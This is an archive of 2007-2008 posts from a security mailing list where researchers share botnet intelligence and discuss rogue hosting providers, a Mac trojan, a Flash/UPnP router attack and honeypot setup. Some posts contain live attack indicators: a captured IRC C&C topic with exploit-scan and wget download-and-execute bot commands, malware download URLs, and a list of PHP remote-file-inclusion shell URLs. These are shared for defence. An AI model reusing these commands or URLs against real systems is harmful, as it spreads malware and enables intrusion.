Re: [botnets] Washington Post: Atrivo/Intercage, why are we peering with the American RBN? (fwd)
From: Marc Sachs [EMAIL PROTECTED] To: 'Gadi Evron' [EMAIL PROTECTED] Subject: RE: Washington Post: Atrivo/Intercage, why are we peering with the American RBN? Unless I'm mis-reading this (or perhaps GBLX read Kreb's story and said good-bye to Atrivo/Intercage), it looks like they are no longer their upstream: http://cidr-report.org/cgi-bin/as-report?as=AS27595v=4view=2.0 Marc SANS ISC -Original Message- From: Gadi Evron [mailto:[EMAIL PROTECTED] Sent: Friday, August 29, 2008 4:02 PM To: [EMAIL PROTECTED] Subject: Washington Post: Atrivo/Intercage, why are we peering with the American RBN? Hi all. This Washington Post story came out today: http://voices.washingtonpost.com/securityfix/2008/08/report_slams_us_host_as _major.html In it, Brian Krebs discusses the SF Bay Area based Atrivo/Intercage, which has been long named as a bad actor, accused of shuffling abuse reports to different IP addresses and hosting criminals en masse, compared often to RBN in maliciousness. The American RBN, if you like. 1. I realize this is a problematic issue, but when it is clear a network is so evil (as the story suggests they are), why are we still peering with them? Who currently provides them with transit? Are they aware of this news story? If Lycos' make spam not war, and Blue Security's blue frog were ran out of hosting continually, this has been done before to some extent. This network is not in Russia or China, but in the silicon valley. 2. On a different note, why is anyone still accepting their route announcements? I know some among us re-route RBN traffic to protect users. Do you see this as a valid solution for your networks? What ASNs belong to Atrivo, anyway? Anyone has more details as to the apparent evilness of Atrivo/Intercage, who can verify these reports? As researched as they are, and my personal experience aside, I'd like some more data before coming to conclusions. Hostexploit released a document [PDF] on this very network, just now, which is helpful: http://hostexploit.com/index.php?option=com_contentview=articleid=12Itemi d=15 Gadi. ___ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] URL format thread killed: back to scheduled programming
When a proposal on the subject is created, it will be shared with all of you. For now... we are here to share, so let's share. Gadi. ___ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] nepethes / honeypot dump list: volunteers and instructions
Hi all. The honey pot dump mailing list is ready. Point your servers to report to; [EMAIL PROTECTED] To get us started I am quoting Jeremy, who came up with the idea of us pointing our nepethes sensors to a mailing list. He is providing with simple instructions on how to get started using nepethes, and how to point them to dump results to the new mailing list. The mailing list which was created is at: [EMAIL PROTECTED] Subscribe at: http://whitestar.linuxbox.org/mailman/listinfo/honeydump Jeremy's how-to: If you just want to get a nepenthes malware collection box up and running, there is a ready to run vmware appliance available at: http://www.dalmatech.com/downloads/Nepenthes.20.zip I have no affiliation with the company, but this vmware appliance is nice, precompiled, and has a great web interface. Just edit the submit-norman.conf like so: submit-norman { // this is the adress where norman sandbox reports will be sent email [EMAIL PROTECTED]; urls(http://sandbox.norman.no/live_4.html;, http://luigi.informatik.uni-mannheim.de/submit.php?action=verify;); }; And then, in nepenthes.conf, uncomment the line submitnorman.so, submit-norman.conf, There is a little write-up on basic usage here: http://www.securityfocus.com/infocus/1880 And the homepage for nepenthes is here: http://nepenthes.mwcollect.org/ ___ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] Washington Post: Atrivo/Intercage, why are we peering with the American RBN?
This Washington Post story came out today: http://voices.washingtonpost.com/securityfix/2008/08/report_slams_us_host_as_major.html I have some thoughts relating more to network operations, but some of you may be interested in following up on this. In the story, Brian Krebs discusses the SF Bay Area based Atrivo/Intercage, which has been long named as a bad actor, accused of shuffling abuse reports to different IP addresses and hosting criminals en masse, compared often to RBN in maliciousness. The American RBN, if you like. 1. I realize this is a problematic issue, but when it is clear a network is so evil (as the story suggests they are), why are we still peering with them? Who currently provides them with transit? Are they aware of this news story? If Lycos' make spam not war, and Blue Security's blue frog were ran out of hosting continually, this has been done before to some extent. This network is not in Russia or China, but in the silicon valley. 2. On a different note, why is anyone still accepting their route announcements? I know some among us re-route RBN traffic to protect users. Do you see this as a valid solution for your networks? What ASNs belong to Atrivo, anyway? Anyone has more details as to the apparent evilness of Atrivo/Intercage, who can verify these reports? As researched as they are, and my personal experience aside, I'd like some more data before coming to conclusions. Hostexploit released a document [PDF] on this very network, just now, which is helpful: http://hostexploit.com/index.php?option=com_contentview=articleid=12Itemid=15 Gadi. ___ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] reviving the botnets@ mailing list: a new statregy in fighting cyber crime
The public botnets@ mailing list, where malicious activity on the Internet can be openly shared, has been revived, and boy is it active. Warning: live samples and malicious URLs are openly shared there. Mailing list URL: http://www.whitestar.linuxbox.org/mailman/listinfo/botnets Reasons, thinking and explanations: http://gadievron.blogspot.com/2008/08/public-sharing-and-new-statregy-in.html Excerpt: -- A couple of years ago I started a mailing list where folks not necessarily involved with the vetted, trusted, closed and snobbish circles of cyber crime fighting (some founded by me) could share information and be informed of threats. In this post I explore some of the history behind information sharing online, and explain the concept behind the botnets mailing list. Feel free to skip ahead if you find the history boring. Also, do note the history in this post is mixed with my own opinions. As I am one of the only people who where there in the beginning though and lived through all of it, I feel free to do so (in my own blog post). As I conclude, we may not be able to always share our resources, but it is time to change the tide of the cyber crime war, and strategize. One of the strategies we need to use, or at least try, is public information sharing of lesser evils already in the public domain. .. .. To fight a war, you have to be involved and engaged. On the Internet that is very difficult, but the Russians found a way. It is a fact that while we made much progress in our efforts fighting cyber crime, we had nearly no effect what-so-ever on the criminals and the attackers. Non. They maintain their business and we play at writing analysis and whack-a-mole. Using the botnets mailing list, I am burrowing a page from the apparent Russian cyber war doctrine, getting people involved, engaged. Personally aware and a part of what's going on. It can't hurt us, and perhaps now, four years over-due and two years after the previous attempt, we may be ready to give it a go and test the concept. --- Gadi Evron. -- You don't need your firewalls! Gadi is Israel's firewall. -- Itzik (Isaac) Cohen, Computers czar, Senior Deputy to the Accountant General, Israel's Ministry of Finance, at the government's CIO conference, 2005. (after two very funny self-deprication quotes, time to even things up!) My profile and resume: http://www.linkedin.com/in/gadievron ___ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] facebook worms and id theft [was: Re: [phishing] XP update phish/malware]
Interesting, Do you or anyone else know more about the account theft that has been going on with FaceBook. I ask because my kid sister was using it for a while and she kept on asking why her password was changed. Shortly there after her friends had the same issue and they had random wall posts going up. Ideas? I'm just curious. Malware spreading via walls and messages. Click on it and you get your credentials stolen and spam your friends. Facebook.* Regards, Adriel T. Desautels Chief Technology Officer Netragard, LLC. Office : 617-934-0269 Mobile : 617-633-3821 http://www.linkedin.com/pub/1/118/a45 Join the Netragard, LLC. Linked In Group: http://www.linkedin.com/e/gis/48683/0B98E1705142 --- Netragard, LLC - http://www.netragard.com - We make IT Safe Penetration Testing, Vulnerability Assessments, Website Security Netragard Whitepaper Downloads: --- Choosing the right provider : http://tinyurl.com/2ahk3j Three Things you must know : http://tinyurl.com/26pjsn Steven Adair wrote: It seems Imageshack with malicious or at least abusive Flash files is getting more popular. We saw a similar attack, yet far less malicious, on Facebook last week. User's walls were spammed with a messae about someone having a crush on them with a link to an Imageshack flash file. The file then did a full redirect to a dating website. The bad guys are both simply just using them as a jumping point and in some cases playing off of their [somewhat] trusted name. Steven On Thu, 28 Aug 2008 09:18:12 -0400, Discini, Sonny [EMAIL PROTECTED] wrote: Here is another XP/Vista download link: ht tp://img 182.imageshack.us/img182/7145/47024671do7 .swf -- Steve I had a bunch of that come through in 3 separate waves yesterday. The malware download pointed to: Hxxp://89.187.49.18/install.exe Note that the payload is known to Sophos so I'm assuming that most of the other big players also pick it up. Nothing new. Sonny Sonny Discini, Senior Network Security Engineer Office of the CIO Department of Technology Services Montgomery County Government -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Steve Pirk Sent: Thursday, August 28, 2008 7:13 AM To: [EMAIL PROTECTED] Cc: Botnets Subject: Re: [phishing] XP update phish/malware Equal bytes for women. On Wed, 27 Aug 2008, Steve Pirk wrote: Here are some links related to a XP update phish/malware download. Image or payload? ht tp://img 504.imageshack.us/img504/6262/23031231ob0 .swf That was the only link in the email. -- Steve Equal bytes for women. ___ phishing mailing list [EMAIL PROTECTED] http://www.whitestar.linuxbox.org/mailman/listinfo/phishing ___ phishing mailing list [EMAIL PROTECTED] http://www.whitestar.linuxbox.org/mailman/listinfo/phishing ___ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] URL formats
On Thu, 28 Aug 2008, Michael Collins wrote: It would be enormously helpful. Personal bias: I do a lot of data analysis on stuff collected by a bunch of groups, and my biggest headaches are always normalization and how did you figure this out, so if we had a standard, that would make my life, personally a lot easier. I'm willing to keep a hold of it and post a faq or other report on it on a regular basis if it'll make everyone else's life easier - it'll certainly make mine so. Go for it. Sounds useful. Although I am not going to enforce it for at least a few weeks yet when we figure what and who we are. On Aug 28, 2008, at 1:32 PM, Chris Burton wrote: Hi, I was wondering if it would be more helpful if we could propose a standard for posting broken URLs with some form of start/end indicator to allow easier automated processing from the listings? ChrisB. ___ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] URL formats
On Thu, 28 Aug 2008, fiberOptiC wrote: Are you asking about a standardized reporting format pertaining to all the information you have obtained and wish to share? The suggestion was about URLs. For now, people.. just share. On Thu, Aug 28, 2008 at 3:14 PM, Gadi Evron [EMAIL PROTECTED] wrote: On Thu, 28 Aug 2008, Michael Collins wrote: It would be enormously helpful. Personal bias: I do a lot of data analysis on stuff collected by a bunch of groups, and my biggest headaches are always normalization and how did you figure this out, so if we had a standard, that would make my life, personally a lot easier. I'm willing to keep a hold of it and post a faq or other report on it on a regular basis if it'll make everyone else's life easier - it'll certainly make mine so. Go for it. Sounds useful. Although I am not going to enforce it for at least a few weeks yet when we figure what and who we are. On Aug 28, 2008, at 1:32 PM, Chris Burton wrote: Hi, I was wondering if it would be more helpful if we could propose a standard for posting broken URLs with some form of start/end indicator to allow easier automated processing from the listings? ChrisB. ___ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ botnets@, the public's dumping ground for maliciousness All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] reviving this list, allowing sharing
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Hi. When this list was started a while back a lot of sharing and discussion was happening. This make us take a step back at the time. Today, when most of this information can do far more good than harm, it is my strong belief open information sharing on botnets, malcious web sites and similar subjects will be useful. Feel free to share data, and let's see how it goes. We, on our end will work to mitigate the risks you send in. Who is first? Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] fake AV (malicious) sites
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- bestantivirus2009 com iframe with exploits: huytegygle com/index.php --script huytegygle com/bin/ file.exe This information is from: http://sunbeltblog.blogspot.com/2008/08/xp-antivirus-2008-now-with-sploits.html Lots of Fake AV sites. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] Another bogus greeting card spamming a malware URL
Another bogus greeting card spamming a malware URL (again, one I've seen for a few days now and still live): h ttp://u gm-records.de/e-card.exe Detection wise...Someone already sent it to VT: http://www.virustotal.com/analisis/50bf6f61971f349a5de651aa5515607f As usual, several days later detection is minimal. Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] CC: 195.5.216.10:7007
Contacting server 195.5.216.10:7007 Connection with 195.5.216.10:7007 (49153) established *** highkey, *** MAP KNOCK SAFELIST HCN MAXCHANNELS=10 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server *** WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=highkey CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server *** MOTD File is missing Channel: ##http *** Topic for ##http: .asc -S|.asc netapi 50 5 0 -b -r -e|.asc asn445 50 5 0 -b -r -e|.asc rpc 50 5 0 -b -r -e|.it.wget http://bhxtakekep.net/loaderadv691.exe C:\s32bit.exe 1 -s *** Topic for ##http set by rdp on Thursday, August 28, 2008 12:43:22 AM *** End of /NAMES list. *** Channel Mode is +smntMu *** Channel created at Wednesday, August 27, 2008 11:48:46 PM ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] downtime
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- I apologize for the lists downtime. We are working to assure this doesn't happen again. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] bot sniffing paper from georgia tech
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- BotSniffer: Detecting Botnet Command and Control Channels in Network Traffic Guofei Gu, Junjie Zhang, and Wenke Lee School of Computer Science, College of Computing Georgia Institute of Technology URL: http://www-static.cc.gatech.edu/~guofei/paper/Gu_NDSS08_botSniffer.pdf Gadi. -- *FART* -- Avi Freedman to Gadi Evron in a Chinese restaurant, Boston 2007. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] (broadband routers) PC World: Flash Attack Could Take Over Your Router
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Props to Jeff Chan who I saw it from. Yes, I still believe these ISP distributed machines called broadband routers are a network operators issue. But not all may agree on that. -- http://news.yahoo.com/s/pcworld/20080116/tc_pcworld/141399 Flash Attack Could Take Over Your Router Robert McMillan, IDG News Service Tue Jan 15, 7:08 PM ET Security researchers have released code showing how a pair of widely used technologies could be misused to take control of a victim's Web browsing experience. The code, published over the weekend by researchers Adrian Pastor and Petko Petkov, exploits features in two technologies: The Universal Plug and Play (UPnP) protocol, which is used by many operating systems to make it easier for them to work with devices on a network; and Adobe Systems' Flash multimedia software. By tricking a victim into viewing a malicious Flash file, an attacker could use UPnP to change the primary DNS (Domain Name System) server used by the router to find other computers on the Internet. This would give the attacker a virtually undetectable way to redirect the victim to fake Web sites. For example, a victim with a compromised router could be taken to the attacker's Web server, even if he typed Citibank.com directly into the Web browser navigation bar. The most malicious of all malicious things is to change the primary DNS server, the researchers wrote. That will effectively turn the router and the network it controls into a zombie which the attacker can take advantage of whenever they feel like it. Because so many routers support UPnP, the researchers believe that ninety nine percent of home routers are vulnerable to this attack. In fact, many other types of UPnP devices, such as printers, digital entertainment systems and cameras are also potentially at risk, they added in a Frequently Asked Questions Web page explaining their research. [...] ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] (broadband routers) PC World: Flash Attack Could TakeOver Your Router
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Wed, 16 Jan 2008, Steven Adair wrote: How are you defining network operators? Do you mean by the normal [in most cases home] user? Apparently flash is able to allow UPnP access per PDP's posting at www.gnucitizen.org. Apparently this is not a flaw and is a feature (we've heard that before) of Flash and works as advertised. However, most of the broadband routers have UPnP open by default, so all a malicious SWF file has to do is start taking action via UPnP from your Linksys/NetGear/D-Link/etc. home router. You might want to look into disabling this function as it apparently doesn't support any form of authentication. Steven Not me, I look at how many are out there, rather than the one home user, in this case. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] test
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Spam botnet discovered
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Mon, 5 Nov 2007, Interspace System Department wrote: The strange thing, that only you complaining about such behaviour ;) I am not complaining, I am dictating. Thanks again. Anyway, these links is safe, as these bots spreading only through FTP (yes, stolen ftp accounts). Have fun, Dan Gadi Evron ÿÿ: On Mon, 5 Nov 2007, Interspace System Department wrote: Hi Gadi, I don't have time for all that obfu/deobfu games, take it as-is ;) I quite understand, but as much as I regret having to say it, take your very valuable information somewhere else. :) Let me explain my position: These links get indexed, and at that point more web servers becomes compromised. I'd go as far as saying people can now seed your log so that you infect them when you report it and people follow links. Ethics and secure sharing are a bitch, but we have to live with them. I hope you understand. Thanks, Dan Gadi Evron ÿÿ: On Mon, 5 Nov 2007, Interspace System Department wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Hi again! Hope you doing well ;) Thanka again for posting. :) When obfuscating links, www shoudl be made into w ww. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Php inclusion locations for 04.11.2007
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Please make them unlinkable such as using hxxp://a bcd.com We don't want them indexed in google. :) On Sun, 4 Nov 2007, Interspace System Department wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Hello, These links is actively used for php inclusion attempts. Valid for 04.11.2007. http://62.141.56.158/cmd.gif http://amygirl.chat.ru/images/image.txt http://baguscrew.net/alat/cmd.txt http://cherrygirl.h18.ru/images/cs.txt http://e-smkk.net/forum/gallery/id.txt http://eventtoday.com/bbs/skin/gallery_thum/safe.txt http://geocities.com/masterHANCUR/HANCUR.txt http://host5.chileadmin.com/~revista/media/help.txt http://productanarchy.com/gallery/g2data/smarty/id http://puterselect.com/modules/Neos_Chronos/id.txt http://rfidstore.it/catalog/images/blank_line.gif http://rh4m4.t35.com/s.txt http://s33xy.ifrance.com/r7 http://stefaniak.myftp.biz/modules/Album/safe.txt http://stopandbid.com/uplimg/safe.txt http://www.catterickcaravans.com/images/echo.txt http://www.lasexta.net/templates/id.txt http://www.ownsyou.kit.net/v/safe.txt http://www.scan-bot.net/id.txt http://www.sznurki.vel.pl/webimages/id.txt http://www.thedreaming.com/cache/id.txt http://www.theoneluckypennyguy.com/cache/echo.txt http://www.zarha.org/pr.txt http://www.zendurl.com/a/animetnt/safe.txt Btw, i'v monitoring some CC server, wich responsible for all *.h18.ru/images/cs.txt and http://amygirl.chat.ru/images/image.txt attempts. Seems like they are Australian. Check here: http://groups.google.com/group/nzphpug/msg/766976ba1bfd51ea Thanks, Dan ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Sun, 4 Nov 2007, Steven Adair wrote: On Sat, 3 Nov 2007 13:54:44 -0400, Mr. X [EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Dude, you gotta get over yourself. The fact that the mac os x operating system has no viruses is not the fault of the user base. And the tirades of the told-you-so's are petty and so OT let's just get back to info on botnets. Anyone targeting the Mac or Linux base is I agree they are OT but technically isn't this entire thread, regardless of the view point? AFAIK there is not presently any botnet associated with this mac trojan or any variants of it as this time. There's definitely potential but no connection, otherwise we could be discussing any piece of malware on this list. It's a trojan horse. It hijacxks DNS and pwns people. Obviously there is a second stage of infection. What do you think it is we do here? ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Sat, 3 Nov 2007, Tom wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- (Sorry on Digest) Hey all give it a break. You want to discuss this/ make a big deal about it then categorize it as a social engineering issue that occurs against not only any software platform but in most real life scams as well. I know many like to hype any issue against the OSX platform. To a certain degree this may indicate the increased targeting of OSX but it is interesting that the increased activity argument never seems to rise when the odd linux or unix social engineering exploit surfaces. Perhaps because none of us really know why an exploit was released or maybe because not a statistic does an isolated one off make? A single instance every now and again does not necessarily indicate a shift in targeting. Nor does a social engineering exploit attempt make a hype-able attack against OSX. Talk to you in 2 years. Seems like much ado... Now if everyone would change focus and help come up with aids to minimize the effectiveness of social engineering attacks (esp against neophyte and residential users) that would be something to write about. Just my 2 cents, Tom ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Thu, 1 Nov 2007, Jeremy Chatfield wrote: snip correct stuff And this has, so far, little to do with botnets... Unless this SE attack is installing a bot. Is it? What does the bot do? Is there a signature? That'd be interesting :) Social engineering or vulnerabilities, the web is much of how bots propagate these days. A trojan horse == bot. That's how we used to call them. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] re MAC trojan
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Thu, 1 Nov 2007, Steven Adair wrote: Not sure this is necessariyl true, but that's beside the point as I'm sure we could have hundreds of witty replies all day long going both ways. The point is this requires user interaction to infect a machine. I am not seeing the part where unpatched vulnerabilities come into play with this. This is no different than if someone had a malicious package sent for download. It requires the user to consent to install something bad.. this isn't a drive-by-exploit targeting all macs like MPack for primarily IE Windows.. not yet anyway. It's a good thing to be on the look out for though, however it's not the end of the internets. It's Mac season? Steven On Thu, 01 Nov 2007 16:35:11 +0200, Interspace System Department [EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Gadi Evron ÿÿ: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Thu, 1 Nov 2007, Gary Flynn wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- This is nothing more than simple downloadable malware exacerbated somewhat by permissive configuration settings. It exploits no security defects. As I understand it, the operator is given multiple opportunities to refuse the program: Yes, but it's who uses it and how that matters. Relax. MAC users are not that stupid as MS users... http://www.jmu.edu/computing/security/#macmalware (I'm only subscribed to the archive so I apologize if this has been already pointed out or already proven incorrect today) ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] the heart of the problem [was: RE: mac trojan in-the-wild]
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Thu, 1 Nov 2007, Thor (Hammer of God) wrote: But more importantly, let's look at things from the other side. Let's say I'm wrong, and that Gadi is right on target with his hit hard I'd say we are both right. You look at it from a security researcher stand-point. There is nothing interesting about user-interaction, and it is even kind of lame. From a reasonable perspective, we refuse to believe people will act so .. silly. prediction and that we should be very concerned with this. Given the Not predicting, assessing. Criminal elements have a very clear cost/benefit calculation. For example, they won't release a 0day such as WMF or ANI as long as their revenue goals are met with published ones. They collect statistics on OS, browser, language, which exploit got how many, etc. They have thousands on thousands of sites infecting users who surf (some of them ad-based on real sites, or defaced sites such as forums that remain with the same content only now infect people). Then there is also spam directing people to these sites. Now, a criminal gang (could be the mob could be one guy) targets the mac. So much so that they serve different malware by OS-type. As a security researcher looking at code, bits and bytes, you are simply not usually following what's going on in operational security where things are bleak. From an operational security standpoint, this equates to what happened in the world of the Internet back when Windows 98 was around. Not what security features it had. requirements here, that again being flagrant ignorance where all the above steps are executed (including the explicit admin part)-- what exactly are we supposed to do? If people are willing and able to go through the motions above what can we as security people do to prevent it? Far too many people in this industry are far too quick to point out how desperate the situation is at all turns, but I don't see many people offering real solutions. But you know, I have to say... If we are Things are in fact FUBAR. We need new ideas and new solutions as honestly, although we want to feel we make a difference by taking care of this or that malware or this and that CC we are powerless and have not made a real difference in the past 6 years while things got worse. We need new solutions and new ideas, and would be more than happy to have new people exploring operational security. The current state of Internet security is you get slapped -- BAM! -- and you write an analysis about it. (when speaking at ISOI I actually slapped myself -- HARD -- when I said it on stage, not a good idea for future reference). really going to consider this serious, and we are really going to define part of our jobs as being responsible for stopping people who have absolutely no concerns for what they do and are willing to enter their admin credentials into any box that asks for it, then I'd say that there is a *serious* misunderstanding about what security is, and what can be done about it-- either that, or I'm just in the wrong business. t Well, we can't choose the risks. They choose us. Sometimes they are cool, sometimes they're not. I often start emails by saying first off, this is not the end of the world, the Sun will rise tomorrow and the Internet won't die today. I tire of it. Of course the Internet won't die today, but it is Mac season. Apple is very much correct by not investing in security first until now -- from a BUSINESS standpoint, however much we as security people in our niche can't get behind it. Things are different now and unfortunately they have a backlog to deal with. Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- For whoever didn't hear, there is a Macintosh trojan in-the-wild being dropped, infecting mac users. Yes, it is being done by a regular online gang--itw--it is not yet another proof of concept. The same gang infects Windows machines as well, just that now they also target macs. http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac-trojan.html http://sunbeltblog.blogspot.com/2007/10/mackanapes-can-now-can-feel-pain-of.html This means one thing: Apple's day has finally come and Apple users are going to get hit hard. All those unpatched vulnerabilities from years past are going to bite them in the behind. I can sum it up in one sentence: OS X is the new Windows 98. Investing in security ONLY as a last resort losses money, but everyone has to learn it for themselves. Gadi Evron. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Wed, 31 Oct 2007, Joel Esler wrote: Um. Not only do you have to purposefully go download it, agree to accept the download, them agree to give the software admin priviledges. That's 3 accept dialogues and a password type in. Hardly malware. Not different from many Windows cases. Only Apple has a long history of unpatched vulnerabilities to cope with. The Widnows 98 eco-system is about to be re-created now that the itw barrier has been broken for Apple. Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] Community input/questions for ISOI 3?
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Hi, like last time, we are looking for community input and questions for the Internet security operations community, to be discussed during ISOI 3. ISOI is happening this Monday and Tuesday, we will likely compile the responses in a few weeks. We will reply to people personally on issues which bother them, and compile a short text with answers to the community itself. We tried to do this last time around, and encountered a problem with classifying which material the presenters allow for public consumtion, and which is to remain private due to obvious concerns. This time around we ask them ahead of time. The current topics being discussed at ISOI 3 can be located on the schedule: http://isotf.org/isoi3.html We may be off though, so feel free to ask on any issue which you find to be relevant. Thanks, we appreciate the community's participation. Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Alternative Botnet CCs - free chapter from Botnets:The Killer Web App
